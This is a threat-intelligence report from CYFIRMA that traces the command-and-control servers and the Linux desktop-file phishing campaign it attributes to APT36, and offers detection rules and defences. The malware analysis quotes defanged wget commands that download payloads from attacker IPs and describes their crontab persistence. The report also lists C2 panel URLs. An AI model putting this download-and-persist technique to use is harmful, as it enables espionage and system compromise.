OSINT Analysis: Tracking Malicious Infrastructure Associated with Transparent Tribe – CYFIRMA

Short Summary:

This report by CYFIRMA investigates the infrastructure of the APT group “Transparent Tribe,” identifying command-and-control (C2) servers linked to the group. The investigation reveals the use of Mythic Poseidon binaries and Linux desktop entry files as attack vectors, targeting individuals in India. The report emphasizes the evolving tactics of Transparent Tribe and the persistent threat they pose.

Key Points:

  • The investigation tracks the infrastructure of the APT group “Transparent Tribe” (APT36) and identifies C2 servers.
  • Prompted by a Twitter post, the investigation focused on two IPs linked to Transparent Tribe’s C2 servers, which are part of the Mythic C2 infrastructure.
  • Utilizing JARM fingerprinting, 15 malicious hosts were identified, all linked to ongoing attacks using customized payloads targeting the Indian region.
  • The group employs malicious Linux desktop entry files disguised as PDFs to establish persistence and evade detection.
  • APT36 is increasingly targeting Linux environments, particularly with the use of Debian-based operating systems in Indian government sectors.
  • The report provides insights into the infrastructure, methods, and tools used by APT36, highlighting their Linux-based attack campaign.

MITRE ATT&CK TTPs – created by AI

  • T1566 – Phishing
    • Spear phishing Attachment
  • T1059 – User Execution
    • Malicious File
    • Command and Scripting Interpreter
  • T1547 – Boot or Logon Autostart Execution
  • T1027 – Obfuscated Files or Information
  • T1564.001 – Hide Artifacts: Hidden Files and Directories
  • T1070.004 – Indicator Removal: File Deletion
  • T1082 – System Information Discovery
  • T1083 – File & Directory Discovery
  • T1071.001 – Application Layer Protocol: Web Protocols
  • T1113 – Screen Capture
  • T1048 – Exfiltration over Alternative Protocol

Published On : 2024-09-27

OSINT Investigation: Hunting Malicious Infrastructure Linked to Transparent Tribe

EXECUTIVE SUMMARY

At CYFIRMA, we provide timely insights into emerging threats and malicious tactics targeting organizations and individuals. This report details an investigation aimed at tracking infrastructure linked to the APT group “Transparent Tribe” and identified potential command-and-control (C2) servers associated with this threat actor.

15 malicious hosts were identified – hosted by DigitalOcean – and the threat actor was also found to be employing Linux desktop entry files as a novel attack vector, targeting Individuals in India.

The report highlights the use of Mythic Poseidon binaries as C2 agents, and the tactics used to evade security and maintain persistence, all of which underscore the continued threat posed by Transparent Tribe and its evolving techniques.

INTRODUCTION

This open-source intelligence (OSINT) investigation seeks to expose the infrastructure tied to the APT group “Transparent Tribe,” with a focus on identifying command-and-control (C2) servers. The investigation was initiated following a Twitter post from security researcher “@PrakkiSathwik,” which flagged the IP addresses 206.189.134.185 and 143.198.64.151 as C2 servers linked to the group.

We chose 143.198.64.151 as the primary pivot point for the investigation. The IP, hosted by DigitalOcean under ASN AS14061, has been identified as a Mythic C2 server, running services on ports 22 (SSH), 80 (HTTP), and 7443 (HTTPS). Mythic is a cross-platform, post-exploitation framework designed for red teaming but has increasingly been misused by threat actors for malicious purposes. Its collaborative, web-based interface and modular architecture allow attackers to efficiently – and remotely – control compromised systems.

To further investigate this infrastructure, we used JARM – a tool that fingerprints servers based on their TLS configurations – and HTML title metadata to identify additional hosts running the Mythic C2 framework. We found that the infrastructure consisted of 15 IPs, hosted on DigitalOcean, all linked to the Mythic exploitation framework.

Our investigation also revealed that the attack campaign uses Linux desktop entry files to deploy malicious payloads: these files, which were first seen uploaded from India, suggest that the targets of this campaign are possibly individuals within the region, which aligns with Transparent Tribe’s history of targeting Indian government officials through phishing and other attack vectors.

In this report, we focus on tracing the malicious infrastructure while providing insight into the deployment of Mythic agents and the tactics used by the threat actor.

KEY POINTS

  • The report focuses on tracking the infrastructure of the APT group “Transparent Tribe” (APT36), identifying C2 servers.
  • The investigation was prompted by a Twitter post identifying two IPs linked to Transparent Tribe’s C2 servers. The servers are part of Mythic C2 infrastructure, a cross-platform post-exploitation framework used for red teaming which is also abused by threat actors like Transparent Tribe for managing compromised systems.
  • The JARM fingerprinting technique initially identified 31,390 servers, which were narrowed down to 15 servers associated with the same malicious infrastructure. These servers, including the pivot IP 143.198.64.151, were found to be hosting Mythic C2 servers and linked to ongoing attacks utilizing customized payloads, such as the Poseidon agent, potentially targeting the Indian region.
  • The group is distributing malicious Linux desktop entry files disguised as PDFs. These files execute scripts to download and run malicious binaries from remote servers, establishing persistent access and evading detection.
  • APT36 is increasingly targeting Linux environments due to their widespread use in Indian government sectors, particularly with the Debian-based BOSS OS and the introduction of Maya OS.
  • This report outlines the infrastructure, methods, and tools used by APT36, providing insights into their Linux-based attack campaign and the evolving threat specifically to India.

ANALYSIS:

Basic Details:
Pivot Point IP: 143[.]198[.]64[.]151 (C2)

The objective of this OSINT investigation is to track the infrastructure associated with the APT group “Transparent Tribe” and identify other potential hosts or servers that may be functioning as C2 servers for this threat actor.

The investigation was initiated based on a Twitter post from a security researcher; “@PrakkiSathwik,” who identified the IP addresses “206.189.134.185” and “143.198.64.151” as C2 servers linked to the “Transparent Tribe” group.

Our investigation begins with the IP address “143.198.64.151” as the primary pivot point.

The IP address has been flagged as malicious by multiple security solutions. The server is associated with activity related to “MYTHIC,” a C2 server. Mythic C2 is a cross-platform, post-exploitation framework commonly used in red teaming operations. It is designed to offer a collaborative, user-friendly interface for operators, managers, and reporting, facilitating efficient coordination and execution throughout red teaming engagements.

Our OSINT investigation reveals the IP address is linked to the hosting provider “DigitalOcean” under ASN number “AS14061,” with the location identified as the United States. The server is running services on ports 22/SSH, 80/HTTP, and 7443/HTTP.

We selected two key pivot points for further investigation based on the available data: the “JARM” fingerprint and the “HTML Title” with the value “Mythic.” JARM is a tool designed to fingerprint servers based on their TLS configurations. It sends a series of unique requests to a server and analyzes the responses to generate a fingerprint which can then be used to identify and categorize servers, helping security teams detect malicious or suspicious infrastructure. JARM aids in identifying servers that may be part of malicious networks, command and control systems, or other harmful activities, even when traditional indicators like IP addresses and domains change.

We constructed the following Censys query to hunt for servers/hosts with the same JARM fingerprint:

services.jarm.fingerprint=”1dd40d40d00040d00042d43d000000831b6af40378e2dd35eeac4e9311926e” .

This query led us to a total of 31,390 hosts.

The second attribute, “Mythic,” refers to the string found in the “HTML Title.” We refined our query by combining both attributes:

services.jarm.fingerprint=”1dd40d40d00040d00042d43d000000831b6af40378e2dd35eeac4e9311926e” and services.http.response.html_title=”Mythic”

This reduced the results to 63 hosts, providing a more focused list. However, for further accuracy, we added a third pivot point: the hosting provider “Digital Ocean.”

The final query, incorporating three attributes – JARM fingerprint, HTML Title, and ASN Name – narrowed the results down to 15 hosts.

(services.jarm.fingerprint=”1dd40d40d00040d00042d43d000000831b6af40378e2dd35eeac4e9311926e” and services.http.response.html_title=”Mythic”) and autonomous_system.name=`DIGITALOCEAN-ASN`

The resultant 15 IPs are provided below:

  • 165[.]232[.]118[.]207
  • 161[.]35[.]186[.]219
  • 178[.]128[.]92[.]166
  • 64[.]23[.]155[.]109
  • 159[.]203[.]133[.]189
  • 138[.]197[.]156[.]131
  • 142[.]93[.]74[.]10
  • 143[.]198[.]64[.]151
  • 152[.]42[.]245[.]111
  • 139[.]59[.]109[.]136
  • 137[.]184[.]211[.]26
  • 159[.]223[.]0[.]196
  • 64[.]23[.]213[.]61
  • 152[.]42[.]198[.]168
  • 206[.]189[.]134[.]185

These IPs are part of a malicious infrastructure, hosting the open-source Mythic exploitation framework, and serve as C2 servers for Mythic agents to execute actions directed by the threat actor.

Many security solutions tagged these IPs as malicious and linked to “Mythic” activity, indicating their involvement as a C2 server for the Mythic framework.

As mentioned earlier, Mythic is an open-source, cross-platform post-exploitation framework, widely used for red teaming and offensive security operations. It is built using Python3, Docker, and Docker-Compose, features a user-friendly web-based interface, and is designed to support collaborative efforts among operators, providing a centralized platform for managing compromised systems, delivering payloads, and executing commands in a stealthy manner.

While Mythic is legitimate software intended for penetration testing and red-teaming, it has also been co-opted by threat actors for malicious purposes. In this context, the identified IPs are being utilized by adversaries to control Mythic agents deployed on compromised systems, functioning as a C2 server to execute commands and exfiltrate data.

The C2 panel for Mythic Poseidon is accessible via the URI path /new/login on these server IPs at port 7443. For example, the C2 panel hosted on the server at IP address 143[.]198[.]64[.]151 can be reached at https[:]//143[.]198[.]64[.]151[:]7443/new/login.

And similarly IP address 165[.]232[.]118[.]207 and others can be reached at https[:]//165[.]232[.]118[.]207[:]7443/new/login and https[:]//Other_IP[:]7443/new/login.

ETLM ATTRIBUTION

The CYFIRMA research team is committed to the ongoing investigation of emerging threats, malware, and the tactics, techniques, and procedures (TTPs) employed by malicious actors. We continuously monitor current threats, track ongoing campaigns, assess their evolution, and remain vigilant to new developments in this ever-changing landscape.

We further continue our investigation into our starting IP “143.198.64.151”, which appears to be part of a broader campaign where the threat actor uses Linux desktop entry files as an attack vector. This method was first recorded in May 2023 by researchers and attributed to “Transparent Tribe” where they targeted Indian government officials. A similar pattern is observed in this campaign, involving the use of Linux desktop entry files and Mythic agent binaries. The associated files, which were first seen/uploaded from India, suggest that the campaign may be targeting individuals within the region.

Possibly the zip archive (Document Details.zip (md5: 01d9e52a4b38beb6541c5d3cae265a26)) containing malicious Linux desktop entry file (Document Details.pdf.desktop (md5: e354cf4cc4177e019ad236f8b241ba3c)), is distributed either through phishing emails or malicious websites.

ZIP archive:
Document Details.zip (md5: 01d9e52a4b38beb6541c5d3cae265a26)

Linux Desktop Entry File:
Document Details.pdf.desktop (md5: e354cf4cc4177e019ad236f8b241ba3c)

The Linux desktop entry file size exceeds 1 MB due to the addition of numerous “#” characters, likely an attempt to evade security scans. The image below highlights the extra characters in the inflated file.

Upon removing these extra “#” characters and blank spaces, we got the following script:

The Linux desktop entry file is crafted to look like a legitimate PDF document link but actually performs a series of malicious actions upon execution.

The icon set to “Icon=application-pdfName[en_US]=DocumentDetails.pdf” looks like a legitimate PDF file. When the file is opened, it initiates a bash command that first opens a PDF file hosted on Google Drive link “https[:]//drive.google[.]com/file/d/1akF76sGydk2k-4tTDydq7T9WxMhoT-av/view?usp=sharing” using xdg-open, which serves as a decoy to hide the real malicious activity.

Simultaneously, it creates a hidden directory (~/.local/share) on the system where it downloads two malicious files (trs-clip and debian-clip) from two remote servers (157[.]245[.]139[.]146 and 159[.]89[.]165[.]86) by using “wget” command.

wget 157[.]245[.]139[.]146/trs-clip -O ~/.local/share/trs-clip
wget 159[.]89[.]165[.]86/debian-clip -O ~/.local/share/debian-clip

These files are given executable permissions, trs-clip runs in the background and its output is redirected to a special directory /dev/null to suppress visible output. Further, it runs the other file debian-clip. Next, the script manipulates the crontab (a Linux scheduling tool) to ensure persistence. It adds commands to the crontab that runs both the malicious scripts (trs-clip and debian-clip) on system reboot. Finally, the file attempts to clean up traces of its presence by removing temporary files.

The Linux desktop entry file downloads malicious payloads from the servers at IP addresses:
157[.]245[.]139[.]146, 159[.]89[.]165[.]86.

We have checked our starting pivot point, the IP “143[.]198[.]64[.]151” and identified the communicating file “debian-clip (md5: 242f77b4e65671a55e103b8b26df46a7)” communicating with this IP. Further analysis identified these Linux payloads as Mythic Poseidon binaries.

Poseidon is a Golang-based agent that compiles executables for both Linux and macOS x64 platforms. The malicious C2 infrastructure was identified as a result of our OSINT investigation, rather than the technical analysis of the binaries. For a detailed understanding of Poseidon’s functionality and capabilities, which are well-documented in the open-source Mythic framework, you can refer to the GitHub repository: https://github.com/MythicAgents/poseidon.

The use of Mythic as a C2 framework highlights the sophistication of the threat actor behind this infrastructure. Mythic’s capabilities allow for highly customizable payload delivery and interaction with compromised systems, potentially enabling large-scale attacks and persistent access. The IPs we identified during the investigation are associated with Mythic’s activity, which suggests involvement in coordinated cyber operations, possibly involving espionage, data theft, or other malicious actions.

Given the use of Linux desktop entry files, similar scripts, and tactics, the deployment of the Mythic exploitation framework, and the Mythic Poseidon binaries as Linux payloads observed in the Indian region we assess that this campaign and its associated malicious infrastructure are linked to the APT group ‘Transparent Tribe.

Transparent Tribe (APT36):
Transparent Tribe, also known as APT36, is a suspected Pakistan-based threat group that has been active since at least 2013. While not highly sophisticated, the group is notably persistent and continually adapts its tactics. APT36 primarily targets Indian government officials, as well as the defense and education sectors.

The group specializes in cyber espionage through credential harvesting and malware distribution. APT36 frequently employs phishing emails and websites to deliver malware, using customized RATs (Remote Access Trojans) and open-source tools such as the Mythic framework. They have also been known to compromise legitimate official applications to enhance their attacks.

APT36 is using malicious Linux binaries as attack vectors due to the widespread use of Linux in the Indian government sector. The Debian-based BOSS OS is used across various ministries and defense forces, creating a large target base. Additionally, the Indian government’s introduction of Maya OS – a Debian-based system, set to replace Windows in government and defense – presents a new opportunity for nation-state actors like APT36 to expand their attacks by targeting Linux environments.

Diamond Model:

CONCLUSION

This investigation successfully tracked and exposed malicious infrastructure linked to the Transparent Tribe (APT36) group by leveraging OSINT techniques. The report’s main objective is to hunt for C2 servers by pivoting on the flagged IP-143[.]198[.]64[.]151, led to the identification of 15 additional servers hosted by DigitalOcean. These servers were found to be part of a larger infrastructure using the Mythic exploitation framework, a tool that facilitates control over compromised systems.

The campaign’s use of Linux desktop entry files as an attack vector that focuses on targeting individuals and systems within the Indian region, points to the use of Mythic Poseidon binaries as payloads. By analyzing techniques, such as JARM fingerprinting and HTML metadata, this investigation provided crucial insights into the operational infrastructure of Transparent Tribe, enabling defenders to understand the scope of their activities and identify patterns for future detection.

The discovery of this infrastructure highlights the growing sophistication and persistence of Transparent Tribe’s tactics, as they continue to adapt and expand their capabilities. The insights gathered from this OSINT investigation will aid in further monitoring and disrupting similar malicious infrastructures in the future.

LIST OF IOCS

Sr No. Indicator Type Remarks
1 143[.]198[.]64[.]151 IP C2-Malicious Infrastructure
2 165[.]232[.]118[.]207 IP C2-Malicious Infrastructure
3 161[.]35[.]186[.]219 IP C2-Malicious Infrastructure
4 178[.]128[.]92[.]166 IP C2-Malicious Infrastructure
5 64[.]23[.]155[.]109 IP C2-Malicious Infrastructure
6 159[.]203[.]133[.]189 IP C2-Malicious Infrastructure
7 138[.]197[.]156[.]131 IP C2-Malicious Infrastructure
8 142[.]93[.]74[.]10 IP C2-Malicious Infrastructure
9 143[.]198[.]64[.]151 IP C2-Malicious Infrastructure
10 152[.]42[.]245[.]111 IP C2-Malicious Infrastructure
11 139[.]59[.]109[.]136 IP C2-Malicious Infrastructure
12 137[.]184[.]211[.]26 IP C2-Malicious Infrastructure
13 159[.]223[.]0[.]196 IP C2-Malicious Infrastructure
14 64[.]23[.]213[.]61 IP C2-Malicious Infrastructure
15 152[.]42[.]198[.]168 IP C2-Malicious Infrastructure
16 206[.]189[.]134[.]185 IP C2-Malicious Infrastructure
17 242f77b4e65671a55e103b8b26df46a7 MD5 File Hash ELF-Binary (Poseidon agent)
18 9d0f1c7825a207a2ad4acd0c9fece794 MD5 File Hash ELF-Binary (Poseidon agent)
19 0d7b6773b8bbf9c000f2e4ff04c626e7 MD5 File Hash ELF-Binary (Poseidon agent)
20 407ebc6e6d90bef35da9fe1062773543 MD5 File Hash ELF-Binary (Poseidon agent)
21 d0a8e733d580fce3bbdad403bf9fd384 MD5 File Hash ELF-Binary (Poseidon agent)
22 01d9e52a4b38beb6541c5d3cae265a26 MD5 File Hash Zip Archive
23 e354cf4cc4177e019ad236f8b241ba3c MD5 File Hash Linux Desktop Entry File
24 78604255c1386b1d62bd818a9c972e20 MD5 File Hash ELF-Binary
25 680619b5858b1a5f785c8af6065f6300 MD5 File Hash ELF-Binary

MITRE ATT&CK TTPs

No. Tactic Technique
1 Initial Access (TA0001) T1566: Phishing
T1566.001: Spear phishing Attachment
2 Execution (TA0002) T1059: User Execution
T1204.002: Malicious File
T1059.004: Command and Scripting Interpreter
3 Persistence (TA0003) T1547: Boot or Logon Autostart Execution
4 Defense Evasion (TA0005) T1027: Obfuscated Files or Information
T1564.001: Hide Artifacts: Hidden Files and Directories
T1070.004: Indicator Removal: File Deletion
5 Discovery (TA0007) T1082: System Information Discovery
T1083: File & Directory Discovery
6 Command and Control (TA0011) T1071.001: Application Layer Protocol: Web Protocols
T1113: Screen Capture
T1048: Exfiltration over Alternative Protocol

YARA Rules

import “hash”

rule TransparentTribe_Hashes_Detection {
meta:
description = “Detection of known hashes associated with Transparent Tribe”
author = “CRT”

condition:
hash.md5(0, filesize) == “242f77b4e65671a55e103b8b26df46a7” or
hash.md5(0, filesize) == “9d0f1c7825a207a2ad4acd0c9fece794” or
hash.md5(0, filesize) == “0d7b6773b8bbf9c000f2e4ff04c626e7” or
hash.md5(0, filesize) == “407ebc6e6d90bef35da9fe1062773543” or
hash.md5(0, filesize) == “d0a8e733d580fce3bbdad403bf9fd384” or
hash.md5(0, filesize) == “01d9e52a4b38beb6541c5d3cae265a26” or
hash.md5(0, filesize) == “e354cf4cc4177e019ad236f8b241ba3c” or
hash.md5(0, filesize) == “78604255c1386b1d62bd818a9c972e20” or
hash.md5(0, filesize) == “680619b5858b1a5f785c8af6065f6300”
}

import “network”
rule MaliciousInfra_IP_Detection {
meta:
description = “Detection of known IP addresses associated with Transparent Tribe”
author = “CRT”

strings:
$ip1 = “143.198.64.151”
$ip2 = “165.232.118.207”
$ip3 = “161.35.186.219”
$ip4 = “178.128.92.166”
$ip5 = “64.23.155.109”
$ip6 = “159.203.133.189”
$ip7 = “138.197.156.131”
$ip8 = “142.93.74.10”
$ip9 = “152.42.245.111”
$ip10 = “139.59.109.136”
$ip11 = “137.184.211.26”
$ip12 = “159.223.0.196”
$ip13 = “64.23.213.61”
$ip14 = “152.42.198.168”
$ip15 = “206.189.134.185”

condition:
any of ($ip*)
}

RECOMMENDATIONS

  • Deploy strong endpoint security solutions equipped with advanced threat detection and prevention capabilities to effectively identify and stop malicious activities.
  • Keep operating systems, applications, and security software up to date with regular patches to mitigate known vulnerabilities frequently exploited by cyber threats.
  • Implement network segmentation to restrict lateral movement, preventing malware from reaching critical assets and containing potential threats within isolated areas.
  • Conduct comprehensive employee training on recognizing phishing threats, emphasizing the risks associated with opening attachments or clicking links in unsolicited emails.
  • Educate employees to identify social engineering tactics, empowering them to avoid falling prey to deceptive strategies that may lead to the execution of malicious files.
  • Configure firewalls to block outbound communication with known malicious IP addresses and domains associated with command-and-control servers.
  • Employ behavior-based monitoring to detect unusual activity patterns, including suspicious processes attempting unauthorized network connections.
  • Enforce application whitelisting policies to allow only approved applications, thereby preventing the execution of unauthorized or malicious executables.
  • Monitor network traffic for abnormal patterns, such as large data transfers to unfamiliar or suspicious IP addresses, indicating potential threats.
  • Develop a comprehensive incident response plan detailing necessary actions in the event of a malware infection, including isolating affected systems and promptly notifying relevant stakeholders.
  • Stay updated with the latest threat intelligence reports and indicators of compromise related to malware to proactively detect and mitigate potential threats.
  • Implement regular backups of critical data and systems to minimize the impact of ransomware attacks or data loss resulting from malware infections.
  • Follow the principle of least privilege (PoLP) by restricting user permissions to only those necessary for specific roles, reducing the impact of malware that relies on elevated privileges.
  • Establish and maintain defensive measures by monitoring and blocking Indicators of Compromise (IOCs), enhancing defenses based on tactical intelligence and provided rules.

Source: Original Post